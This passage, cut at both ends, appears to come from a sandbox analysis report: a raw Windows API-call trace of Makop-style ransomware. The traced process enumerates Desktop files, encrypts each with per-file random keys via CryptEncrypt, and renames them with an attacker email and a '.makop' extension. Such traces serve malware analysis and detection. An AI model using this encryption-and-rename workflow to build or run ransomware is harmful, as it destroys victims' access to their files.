pdwDataLen=0x245f768*=0x17c00) returned 1 [0127.763] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.763] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x17c00, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0x17c00, lpOverlapped=0x0) returned 1 [0127.763] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.763] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x17cd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.763] SetEndOfFile (hFile=0x114) returned 1 [0127.767] GetProcessHeap () returned 0x550000 [0127.767] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.767] GetProcessHeap () returned 0x550000 [0127.767] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.767] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\srnAn8rQ66Z4.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\srnan8rq66z4.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\srnAn8rQ66Z4.odt.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\srnan8rq66z4.odt.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.768] CloseHandle (hObject=0x114) returned 1 [0127.771] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8be4f20, ftCreationTime.dwHighDateTime=0x1d5e044, ftLastAccessTime.dwLowDateTime=0xe2882790, ftLastAccessTime.dwHighDateTime=0x1d5dd00, ftLastWriteTime.dwLowDateTime=0xe2882790, ftLastWriteTime.dwHighDateTime=0x1d5dd00, nFileSizeHigh=0x0, nFileSizeLow=0xf4e, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="TCeD5C3IPdNDpg7Q.flv", cAlternateFileName="TCED5C~1.FLV")) returned 1 [0127.771] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\TCeD5C3IPdNDpg7Q.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\tced5c3ipdndpg7q.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.771] GetProcessHeap () returned 0x550000 [0127.771] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.771] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.771] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.771] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0x2, lpOverlapped=0x0) returned 1 [0127.772] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.772] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.772] GetProcessHeap () returned 0x550000 [0127.772] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.772] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245f768*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245f768*=0x50) returned 1 [0127.772] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.772] WriteFile (in: hFile=0x114, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245f780*=0x50, lpOverlapped=0x0) returned 1 [0127.773] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.773] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.773] WriteFile (in: hFile=0x114, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.773] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.773] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.775] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.775] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.775] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.775] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xf4e, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xf4e, lpOverlapped=0x0) returned 1 [0127.775] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xf50, dwBufLen=0xf50 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xf50) returned 1 [0127.775] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.775] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xf50, lpOverlapped=0x0) returned 1 [0127.776] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.776] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x1034, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.776] SetEndOfFile (hFile=0x114) returned 1 [0127.779] GetProcessHeap () returned 0x550000 [0127.779] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.779] GetProcessHeap () returned 0x550000 [0127.779] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.779] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\TCeD5C3IPdNDpg7Q.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\tced5c3ipdndpg7q.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\TCeD5C3IPdNDpg7Q.flv.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\tced5c3ipdndpg7q.flv.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.781] CloseHandle (hObject=0x114) returned 1 [0127.782] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb4f3e0, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0xbd9510f0, ftLastAccessTime.dwHighDateTime=0x1d5df6d, ftLastWriteTime.dwLowDateTime=0xbd9510f0, ftLastWriteTime.dwHighDateTime=0x1d5df6d, nFileSizeHigh=0x0, nFileSizeLow=0xd734, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="uEQvyEeHZ.csv", cAlternateFileName="UEQVYE~1.CSV")) returned 1 [0127.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\uEQvyEeHZ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ueqvyeehz.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.782] GetProcessHeap () returned 0x550000 [0127.782] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.782] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.782] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.782] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0xc, lpOverlapped=0x0) returned 1 [0127.783] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.783] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.783] GetProcessHeap () returned 0x550000 [0127.783] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.783] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f768*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f768*=0x40) returned 1 [0127.783] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.783] WriteFile (in: hFile=0x114, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245f780*=0x40, lpOverlapped=0x0) returned 1 [0127.783] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.784] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.784] WriteFile (in: hFile=0x114, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.784] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.784] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.784] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.784] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.784] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.784] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xd734, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xd734, lpOverlapped=0x0) returned 1 [0127.785] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xd740, dwBufLen=0xd740 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xd740) returned 1 [0127.785] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.785] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xd740, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xd740, lpOverlapped=0x0) returned 1 [0127.786] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.786] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0xd814, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.786] SetEndOfFile (hFile=0x114) returned 1 [0127.789] GetProcessHeap () returned 0x550000 [0127.789] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.789] GetProcessHeap () returned 0x550000 [0127.789] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.789] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\uEQvyEeHZ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ueqvyeehz.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\uEQvyEeHZ.csv.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ueqvyeehz.csv.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.793] CloseHandle (hObject=0x114) returned 1 [0127.793] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64f2af90, ftCreationTime.dwHighDateTime=0x1d5dc23, ftLastAccessTime.dwLowDateTime=0xd6f0a4a0, ftLastAccessTime.dwHighDateTime=0x1d5e496, ftLastWriteTime.dwLowDateTime=0xd6f0a4a0, ftLastWriteTime.dwHighDateTime=0x1d5e496, nFileSizeHigh=0x0, nFileSizeLow=0xdec8, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="vYJh.wav", cAlternateFileName="")) returned 1 [0127.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\vYJh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\vyjh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.793] GetProcessHeap () returned 0x550000 [0127.793] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.793] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.793] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.793] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.794] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.794] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.794] GetProcessHeap () returned 0x550000 [0127.794] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0127.794] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30) returned 1 [0127.795] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.795] WriteFile (in: hFile=0x114, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245f780*=0x30, lpOverlapped=0x0) returned 1 [0127.795] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.795] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.795] WriteFile (in: hFile=0x114, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.795] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.795] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.795] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.795] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.795] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.795] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xdec8, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xdec8, lpOverlapped=0x0) returned 1 [0127.796] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xded0, dwBufLen=0xded0 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xded0) returned 1 [0127.797] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.797] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xded0, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xded0, lpOverlapped=0x0) returned 1 [0127.797] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.797] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0xdf94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.797] SetEndOfFile (hFile=0x114) returned 1 [0127.800] GetProcessHeap () returned 0x550000 [0127.800] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0127.800] GetProcessHeap () returned 0x550000 [0127.800] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.800] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\vYJh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\vyjh.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\vYJh.wav.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\vyjh.wav.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.801] CloseHandle (hObject=0x114) returned 1 [0127.801] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ce0130, ftCreationTime.dwHighDateTime=0x1d5e561, ftLastAccessTime.dwLowDateTime=0xc5bb7610, ftLastAccessTime.dwHighDateTime=0x1d5e1a8, ftLastWriteTime.dwLowDateTime=0xc5bb7610, ftLastWriteTime.dwHighDateTime=0x1d5e1a8, nFileSizeHigh=0x0, nFileSizeLow=0x1370f, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="wzcS4BMO.avi", cAlternateFileName="")) returned 1 [0127.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\wzcS4BMO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\wzcs4bmo.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.801] GetProcessHeap () returned 0x550000 [0127.801] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.801] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.801] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.802] WriteFile (in: hFile=0x114, lpBuffer=0x245f7b0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f7b0*, lpNumberOfBytesWritten=0x245f780*=0x1, lpOverlapped=0x0) returned 1 [0127.803] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.803] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.803] GetProcessHeap () returned 0x550000 [0127.803] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.803] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f768*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f768*=0x40) returned 1 [0127.803] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.803] WriteFile (in: hFile=0x114, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245f780*=0x40, lpOverlapped=0x0) returned 1 [0127.803] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.803] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.803] WriteFile (in: hFile=0x114, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.803] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.804] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.804] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.804] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.804] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.804] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1370f, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0x1370f, lpOverlapped=0x0) returned 1 [0127.805] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0x13710, dwBufLen=0x13710 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0x13710) returned 1 [0127.806] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.806] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x13710, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, 